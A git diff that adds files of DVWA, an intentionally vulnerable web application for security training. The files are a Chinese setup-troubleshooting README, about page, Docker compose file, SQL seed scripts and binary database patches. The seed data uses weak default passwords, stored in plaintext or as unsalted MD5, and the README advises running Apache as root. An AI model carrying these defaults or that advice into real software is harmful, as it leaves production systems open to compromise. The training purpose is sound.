įĄŽäŋäŊŋį”¨įš„č´Ļåˇå¯†į æ˜¯æ­ŖįĄŽįš„。 + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` +åĻ‚æžœįœ‹åˆ°äģĨ下提į¤ēäŋĄæ¯īŧŒč¯´æ˜ŽåŊ“前äŊŋį”¨įš„č´Ļåˇå¯†į æ˜¯æ­ŖįĄŽįš„īŧŒäŊ†æ˜¯æ˛Ąæœ‰čŽŋ问åŊ“前数捎åē“įš„权限。重新配įŊŽæ•°æŽåē“īŧŒæŖ€æŸĨ一下配įŊŽįš„数捎åē“名是åĻæ­ŖįĄŽã€‚ + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +最后一ä¸Ē可čƒŊ遇到įš„é”™č¯¯åĻ‚下: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +čŋ™ä¸æ˜¯č¯´č´Ļåˇå¯†į ä¸æ­ŖįĄŽīŧŒč€Œæ˜¯æ•°æŽåē“æ˛Ąå¯åŠ¨īŧŒæ‰§čĄŒåĻ‚下å‘Ŋäģ¤īŧš + +```sh +sudo service mysql start +``` + +### Unknown authentication method + +在 MySQL 最新įš„几ä¸Ēį‰ˆæœŦ中, PHPįš„éģ˜čŽ¤é…įŊŽæ— æŗ•čŋžæŽĨ数捎åē“。 æ­¤æ—ļčŋ›čĄŒåŽ‰čŖ…配įŊŽīŧŒäŧšæį¤ēäģĨ下æļˆæ¯īŧŒé‚Ŗ么需čĻæ‰‹åŠ¨äŋŽæ”šé…įŊŽã€‚ + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +有两ä¸Ē办æŗ•īŧŒæœ€įŽ€å•įš„å°ąæ˜¯å¸čŊŊ MySQL 厉čŖ… MariaDB å°ąčĄŒäē†ã€‚ 下éĸ是 MariaDB įš„厘斚文æĄŖ: + + + +åĻ一ä¸Ē办æŗ•åĻ‚下: + +1. į”¨ root čēĢäģŊįŧ–čž‘č¯Ĩ配įŊŽæ–‡äģļ: `/etc/mysql/mysql.conf.d/mysqld.cnf` +1. 在 `[mysqld]` æ­¤čĄŒ, æˇģ加åĻ‚下内厚: + `default-authentication-plugin=mysql_native_password` +1. 重启数捎åē“īŧŒå‘Ŋäģ¤: `sudo service mysql restart` +1. æŸĨč¯ĸ数捎åē“į”¨æˆˇįš„čēĢäģŊčŽ¤č¯æ–šåŧ: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +1. åĻ‚果昞į¤ēįš„是 `caching_sha2_password`. é‚Ŗäšˆæ‰§čĄŒä¸‹éĸįš„å‘Ŋäģ¤: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. 再æŸĨ一遍īŧŒåē”č¯Ĩ昞į¤ēįš„是 `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +äŋŽæ”šåŽŒæˆåŽīŧŒDVWA 厉čŖ…į¨‹åēåē”č¯Ĩ可äģĨæ­Ŗ常čŋ›čĄŒã€‚ + +åĻ‚æžœæƒŗäē†č§Ŗ更多į›¸å…ŗ内厚īŧŒč¯ˇčŽŋ问: . + +### Database Error #2002: No such file or directory. + +数捎åē“æ˛Ąæœ‰å¯åŠ¨ã€‚ 在 Debian ä¸Šæ‰§čĄŒåĻ‚下å‘Ŋäģ¤åŗ可: + +```sh +sudo service mysql start +``` + +### Errors "MySQL server has gone away" and "Packets out of order" + +å‡ēįŽ°čŋ™ä¸Ēé”™č¯¯æœ‰å¤šä¸Ē原因īŧŒæœ€æœ‰å¯čƒŊ是åŊ“前数捎åē“į‰ˆæœŦ和 PHP į‰ˆæœŦ不å…ŧ厚å¯ŧ致įš„。 + +垈有可čƒŊ是åŊ“前į”¨įš„数捎åē“是最新įš„īŧŒå¯ŧ致 PHP 不å…ŧ厚īŧŒ 最åĨŊįš„办æŗ•čŋ˜æ˜¯æ”žåŧƒ MySQL 厉čŖ… MariaDB īŧŒå› ä¸ē不å…ŧ厚闎éĸ˜īŧŒæˆ‘äģŦ䚟无æŗ•æäž›æ”¯æŒã€‚ + +更多į›¸å…ŗ内厚īŧŒč¯ˇčŽŋ问: + + + +### å‘Ŋäģ¤æŗ¨å…Ĩæ˛Ąååē” + +čŋ™ä¸Ē原因是 Apache æ˛Ąæœ‰æƒé™æ‰§čĄŒįŗģįģŸå‘Ŋäģ¤īŧŒåĻ‚果是 Linux įŗģįģŸīŧŒč¯ˇį”¨rootį”¨æˆˇå¯åŠ¨ApacheīŧŒ åĻ‚果是Windowsč¯ˇäģĨįŽĄį†å‘˜čēĢäģŊ启动Apache。 + +### 在 CentOS 上čŋžä¸ä¸Šæ•°æŽåē“īŧŸ + +垈有可čƒŊ是启į”¨äē† SELinux. čĻäšˆå…ŗ闭 SELinux čĻäšˆæ‰§čĄŒä¸‹éĸįš„å‘Ŋäģ¤īŧŒäģĨå…čŽ¸æ•°æŽåē“čŽŋ问: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### 更多 + +更多闎éĸ˜č¯ˇå‚č€ƒäģĨ下äģ“åē“ä¸­åˇ˛å…ŗ闭įš„ issue : + + + +在提äē¤issue䚋前īŧŒįĄŽäŋäŊŋį”¨įš„是č¯Ĩäģ“åē“最新į‰ˆæœŦįš„äģŖį ã€‚æœŦäģ“åē“äģŖį ä¸æ˜¯æœ€æ–°įš„, åĒ是ä¸ģåš˛ä¸­įš„最新äģŖį ã€‚ + +åĻ‚果需čĻæäē¤issueīŧŒč¯ˇč‡ŗ少提䞛äģĨ下äŋĄæ¯: + +- 操äŊœįŗģįģŸæ˜¯äģ€äšˆīŧŸ +- å‡ēįŽ°é”™č¯¯åŽįš„web厚器中最后č‡ŗ少äē”čĄŒæ—Ĩåŋ—。 +- åĻ‚果是数捎åē“čŽ¤č¯é—Žéĸ˜īŧŒé‚Ŗå°ąé‡æ–°čŋ›čĄŒä¸€éä¸Šéĸįš„æ­ĨéĒ¤īŧŒæˆĒ回每一æ­Ĩ。将čŋ™äē›æˆĒ回与昞į¤ē数捎åē“į”¨æˆˇå’Œå¯†į įš„配įŊŽæ–‡äģļ部分įš„åąåš•æˆĒ回一čĩˇæäē¤ã€‚ +- 寚č¯Ĩ问éĸ˜įš„č¯Ļįģ†æčŋ°īŧŒäŊ č§‰åž—äŧšå‘į”Ÿäģ€äšˆīŧŒäģĨ及äŊ åˇ˛įģå°Ŋ力åŽģč§Ŗå†ŗ厃。像 "į™ģåŊ•å¤ąč´Ĩ" 不čļŗäģĨčŽŠæˆ‘äģŦ明į™Ŋ您įš„é—Žéĸ˜å‡ē在å“Ē里īŧŒäšŸæ— æŗ•å¸ŽåŠŠæ‚¨č§Ŗå†ŗ。 +- - - + +## SQLite3 SQL æŗ¨å…Ĩ + +_寚č¯Ĩ部分įš„支持是有限įš„, 在提äē¤issue䚋前īŧŒįĄŽäŋåˇ˛įģå°č¯•å°Ŋ力åŽģč§Ŗå†ŗ, č€Œä¸æ˜¯įŽ€å•įš„一åĨ "åŽƒæ˛Ąååē”"。_ + +通常情å†ĩ下 SQL æŗ¨å…Ĩ 和 SQL į›˛æŗ¨ éƒŊ是寚äŊŋį”¨ MySQL 和 MariaDB 数捎åē“įĢ™į‚ščŋ›čĄŒæĩ‹č¯•įš„īŧŒäŊ†æ˜¯äšŸå¯äģĨį”¨åœ¨sqlite上。 + +我不打įŽ—äģ‹įģåĻ‚äŊ•åœ¨PHP中äŊŋį”¨ SQLite3 īŧŒ 不čŋ‡åŽ‰čŖ… `php-sqlite3` 䞝čĩ–æĨ厞įŽ° PHP čŋžæŽĨ SQLite3 åē”č¯Ĩæ˜¯æ¯”čžƒįŽ€å•įš„。 + +čĻåˆ‡æĸä¸ē SQLite3 åĒ需čĻįŧ–螑下éĸå‡ čĄŒ: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +éģ˜čŽ¤æƒ…å†ĩīŧŒäŊŋį”¨įš„是 `database/sqli.db` 文äģļ, åĻ‚果配įŊŽé”™äē†æˆ–č€…å´Šäē†īŧŒåĒčĻå¤åˆļ一äģŊ `database/sqli.db.dist` čĻ†į›–掉原文äģļå°ąčĄŒäē†ã€‚ + +可čƒŊå‡ēįŽ°įš„é—Žéĸ˜å’Œ MySQL åˇŽä¸å¤šīŧŒå”¯ä¸€ä¸åŒįš„是īŧŒåŊ“前数捎åē“是SQLite3 + +- - - + +## å…ŗäēŽ + +饚į›Žåœ°å€: + +*DVWA å›ĸ队* diff --git a/DVWA/SECURITY.md b/DVWA/SECURITY.md new file mode 100644 index 00000000..671e87d5 --- /dev/null +++ b/DVWA/SECURITY.md @@ -0,0 +1 @@ +The clue is in its name, DVWA contains both intentional and unintentional vulnerabliities, that is it's whole point, please do not try to report them. diff --git a/DVWA/about.php b/DVWA/about.php new file mode 100644 index 00000000..1b505fba --- /dev/null +++ b/DVWA/about.php @@ -0,0 +1,56 @@ + +

About

+

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment

+

Pre-August 2020, All material is copyright 2008-2015 RandomStorm & Ryan Dewhurst.

+

Ongoing, All material is copyright Robin Wood and probably Ryan Dewhurst.

+ +

Links

+
    +
  • Project Home: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA' ) . "
    • +
  • Bug Tracker: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/issues' ) . "
    • +
  • Wiki: " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/wiki' ) . "
    • +
+ +

Credits

+
    +
  • Brooks Garrett: " . dvwaExternalLinkUrlGet( 'http://brooksgarrett.com/','www.brooksgarrett.com' ) . "
    • +
  • Craig
    • +
  • g0tmi1k: " . dvwaExternalLinkUrlGet( 'https://blog.g0tmi1k.com/','g0tmi1k.com' ) . "
    • +
  • Jamesr: " . dvwaExternalLinkUrlGet( 'https://www.creativenucleus.com/','www.creativenucleus.com' ) . "
    • +
  • Jason Jones
    • +
  • RandomStorm
    • +
  • Ryan Dewhurst: " . dvwaExternalLinkUrlGet( 'https://wpscan.com/','wpscan.com' ) . "
    • +
  • Shinkurt: " . dvwaExternalLinkUrlGet( 'http://www.paulosyibelo.com/','www.paulosyibelo.com' ) . "
    • +
  • Tedi Heriyanto: " . dvwaExternalLinkUrlGet( 'http://tedi.heriyanto.net/','tedi.heriyanto.net' ) . "
    • +
  • Tom Mackenzie
    • +
  • Robin Wood: " . dvwaExternalLinkUrlGet( 'https://digi.ninja/','digi.ninja' ) . "
    • +
  • Zhengyang Song: " . dvwaExternalLinkUrlGet( 'https://github.com/songzy12/','songzy12' ) . "
    • +
+ +

License

+

Damn Vulnerable Web Application (DVWA) is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version.

+ +

Development

+

Everyone is welcome to contribute and help make DVWA as successful as it can be. All contributors can have their name and link (if they wish) placed in the credits section. To contribute pick an Issue from the Project Home to work on or submit a patch to the Issues list.

+\n"; + +dvwaHtmlEcho( $page ); + +exit; + +?> diff --git a/DVWA/compose.yml b/DVWA/compose.yml new file mode 100644 index 00000000..adc9610a --- /dev/null +++ b/DVWA/compose.yml @@ -0,0 +1,39 @@ +volumes: + dvwa: + + +networks: + dvwa: + + +services: + dvwa: + build: . + image: ghcr.io/digininja/dvwa:latest + # Change `always` to `build` to build from local source + pull_policy: always + environment: + - DB_SERVER=db + depends_on: + - db + # Uncomment the next 2 lines to serve local source + # volumes: + # - ./:/var/www/html + networks: + - dvwa + ports: + - 127.0.0.1:4280:80 + restart: unless-stopped + + db: + image: docker.io/library/mariadb:10 + environment: + - MYSQL_ROOT_PASSWORD=dvwa + - MYSQL_DATABASE=dvwa + - MYSQL_USER=dvwa + - MYSQL_PASSWORD=p@ssw0rd + volumes: + - dvwa:/var/lib/mysql + networks: + - dvwa + restart: unless-stopped diff --git a/DVWA/config/config.inc.php.dist b/DVWA/config/config.inc.php.dist new file mode 100644 index 00000000..269f367b --- /dev/null +++ b/DVWA/config/config.inc.php.dist @@ -0,0 +1,56 @@ + diff --git a/DVWA/database/create_mssql_db.sql b/DVWA/database/create_mssql_db.sql new file mode 100644 index 00000000..a1657f6c --- /dev/null +++ b/DVWA/database/create_mssql_db.sql @@ -0,0 +1,15 @@ +/* +In case I get round to adding MS SQL support, this creates and populates the tables. +*/ + +CREATE DATABASE dvwa; + +USE dvwa; + +CREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), [user] VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login DATETIME, failed_login INT); + +INSERT INTO users VALUES ('1','admin','admin','admin',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'admin.jpg', GETUTCDATE(), '0'), ('2','Gordon','Brown','gordonb',CONVERT(NVARCHAR(32),HashBytes('MD5', 'abc123'),2),'gordonb.jpg', GETUTCDATE(), '0'), ('3','Hack','Me','1337',CONVERT(NVARCHAR(32),HashBytes('MD5', 'charley'),2),'1337.jpg', GETUTCDATE(), '0'), ('4','Pablo','Picasso','pablo',CONVERT(NVARCHAR(32),HashBytes('MD5', 'letmein'),2),'pablo.jpg', GETUTCDATE(), '0'), ('5', 'Bob','Smith','smithy',CONVERT(NVARCHAR(32),HashBytes('MD5', 'password'),2),'smithy.jpg', GETUTCDATE(), '0'); + +CREATE TABLE guestbook (comment_id INT IDENTITY(1,1) PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100),2); + +INSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test'); diff --git a/DVWA/database/create_oracle_db.sql b/DVWA/database/create_oracle_db.sql new file mode 100644 index 00000000..7bf70f2a --- /dev/null +++ b/DVWA/database/create_oracle_db.sql @@ -0,0 +1,27 @@ +/* Create a copy of the database and contents in Oracle */ + +CREATE TABLE users ( +user_id NUMBER NOT NULL, +first_name varchar(20) DEFAULT NULL, +last_name varchar(20) DEFAULT NULL, +"user" varchar(20) DEFAULT NULL, +password varchar(20) DEFAULT NULL, +avatar varchar(20) DEFAULT NULL, +last_login TIMESTAMP, +failed_login NUMBER, +PRIMARY KEY (user_id) +); + +CREATE TABLE guestbook +(comment_id NUMBER GENERATED BY DEFAULT AS IDENTITY, +"comment" VARCHAR(100) DEFAULT NULL, +"name" VARCHAR(100) NOT NULL, +PRIMARY KEY (comment_id)); + +INSERT INTO users values ('1','admin','admin','admin',('password'),'admin.jpg', sysdate, '0'); +INSERT INTO users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', sysdate, '0'); +INSERT INTO users values ('3','Hack','Me','1337',('charley'),'1337.jpg', sysdate, '0'); +INSERT INTO users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', sysdate, '0'); +INSERT INTO users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', sysdate, '0'); + +INSERT INTO guestbook ("comment", "name") VALUES ('What a brilliant app!', 'Marcel Marceau'); diff --git a/DVWA/database/create_postgresql_db.sql b/DVWA/database/create_postgresql_db.sql new file mode 100644 index 00000000..20e96147 --- /dev/null +++ b/DVWA/database/create_postgresql_db.sql @@ -0,0 +1,7 @@ +CREATE TABLE users (user_id INT PRIMARY KEY,first_name VARCHAR(15),last_name VARCHAR(15), "user" VARCHAR(15), password VARCHAR(32),avatar VARCHAR(70), last_login timestamp, failed_login INT); + +INSERT INTO users VALUES ('1','admin','admin','admin',MD5('password'),'admin.jpg', CURRENT_TIMESTAMP, '0'),('2','Gordon','Brown','gordonb',MD5('abc123'),'gordonb.jpg', CURRENT_TIMESTAMP, '0'), ('3','Hack','Me','1337',MD5('charley'),'1337.jpg', CURRENT_TIMESTAMP, '0'), ('4','Pablo','Picasso','pablo',MD5('letmein'),'pablo.jpg', CURRENT_TIMESTAMP, '0'), ('5', 'Bob','Smith','smithy',MD5('password'),'smithy.jpg', CURRENT_TIMESTAMP, '0'); + +CREATE TABLE guestbook (comment_id serial PRIMARY KEY, comment VARCHAR(300), name VARCHAR(100)); + +INSERT INTO guestbook (comment, name) VALUES ('This is a test comment.','test'); diff --git a/DVWA/database/create_sqlite_db.sql b/DVWA/database/create_sqlite_db.sql new file mode 100644 index 00000000..08463dc1 --- /dev/null +++ b/DVWA/database/create_sqlite_db.sql @@ -0,0 +1,27 @@ +CREATE TABLE `users` ( +`user_id` int NOT NULL, +`first_name` text DEFAULT NULL, +`last_name` text DEFAULT NULL, +`user` text DEFAULT NULL, +`password` text DEFAULT NULL, +`avatar` text DEFAULT NULL, +`last_login` datetime, +`failed_login` int, +PRIMARY KEY (`user_id`) +); + +CREATE TABLE `guestbook` ( +`comment_id` int, +`comment` text default null, +`name` text DEFAULT NULL, +PRIMARY KEY (`comment_id`) +); + + +insert into users values ('1','admin','admin','admin',('password'),'admin.jpg', DATE(), '0'); +insert into users values ('2','Gordon','Brown','gordonb',('abc123'),'gordonb.jpg', DATE(), '0'); +insert into users values ('3','Hack','Me','1337',('charley'),'1337.jpg', DATE(), '0'); +insert into users values ('4','Pablo','Picasso','pablo',('letmein'),'pablo.jpg', DATE(), '0'); +insert into users values ('5','Bob','Smith','smithy',('password'),'smithy.jpg', DATE(), '0');; + +insert into guestbook values ('1', 'What a brilliant app!', 'Marcel Marceau'); diff --git a/DVWA/database/sqli.db b/DVWA/database/sqli.db new file mode 100644 index 0000000000000000000000000000000000000000..53611582558fa8d6a3c44fe01fbf0497ec5cebdf GIT binary patch literal 20480 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 